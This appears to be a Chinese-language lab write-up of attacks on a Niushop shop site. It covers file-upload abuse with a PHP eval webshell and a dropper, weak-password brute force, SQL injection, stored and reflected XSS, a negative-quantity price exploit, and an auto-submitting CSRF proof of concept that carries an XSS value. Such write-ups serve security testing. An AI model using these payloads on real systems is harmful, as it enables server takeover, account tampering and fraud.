文件上传漏洞
注册一个账号后登录

在个人中心修改个人头像



选择我们的图片马
#一句话(不想麻烦的选择一句话也可以)
<?php @eval($_POST["cmd"]);?>
#生成h.php文件
<?php
fputs(fopen('h.php','w'),'<?php @eval($_POST["cmd"]);?>');
?>
在BP中进行抓包,改为1.php

右键图片在网页新建打开图片标签;就能获取路径

去蚁剑连接生成的.php就行

弱口令
使用BP抓包

在用户名和密码位添加payload

payload设置;选择我们的字典

开始攻击

得出用户名密码

#用户名
admin
#密码
admin1
成功登录

SQL注入漏洞
基于布尔时间盲注
第一个存在点


使用sqlmap跑一下

第二个存在点

二次外带注入


XSS漏洞
存储型
1.后台-->设置-->基础设置-->商城第三方统计代码

来到首页就会弹窗

2.后台-->网站--->广告位
反射型
1.后台--微信--消息管理素材管理-->添加消息存储-->标题


0元购
在商品页面抓包

通过改变数量改变价格

在放行一次修改数量为-1

后面全部放行就OK了

CSRF漏洞
下载源码;制作修改用户信息链接
修改用户信息

BP抓包;制作SCRF

复制下来制作链接
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="http://172.16.1.195/niushop/index.php?s=/member/person" method="POST" enctype="multipart/form-data">
<input type="hidden" name="user_name" value="bbbcdff" />
<input type="hidden" name="real_name" value="11wsdasa" />
<input type="hidden" name="birthday" value="1970-01-01" />
<input type="hidden" name="location" value="'onclick='alert(1)'" />
<input type="hidden" name="user_qq" value="2461" />
<input type="hidden" name="act" value="act_edit_profile" />
<input type="hidden" name="submit" value="确认修改基本信息" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
用户在已登录的状态点击我们的链接


